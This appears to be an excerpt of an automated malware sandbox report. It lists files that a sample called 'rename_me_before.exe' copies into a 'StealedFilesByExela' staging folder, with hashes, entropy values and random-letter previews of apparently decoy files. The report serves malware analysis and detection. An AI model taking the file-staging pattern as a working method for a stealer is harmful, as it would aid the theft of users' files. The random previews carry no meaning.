                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\ONBQCLYSPU\WUTJSCBCFX.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\UMMBDNEQBN\BPMLNOBVSB.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\UMMBDNEQBN\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\UMMBDNEQBN\LTKMYBSEYZ.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\UMMBDNEQBN\UMMBDNEQBN.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\UMMBDNEQBN\UOOJJOZIRH.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                                          MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                                          SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                                          SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                                          SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\UMMBDNEQBN\WKXEWIOTXI.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                                          MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                                          SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                                          SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                                          SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\VLZDGUKUTZ\FENIVHOIKN.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                                          MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                                          SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                                          SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                                          SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\VLZDGUKUTZ\HTAGVDFUIE.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                          Malicious:false
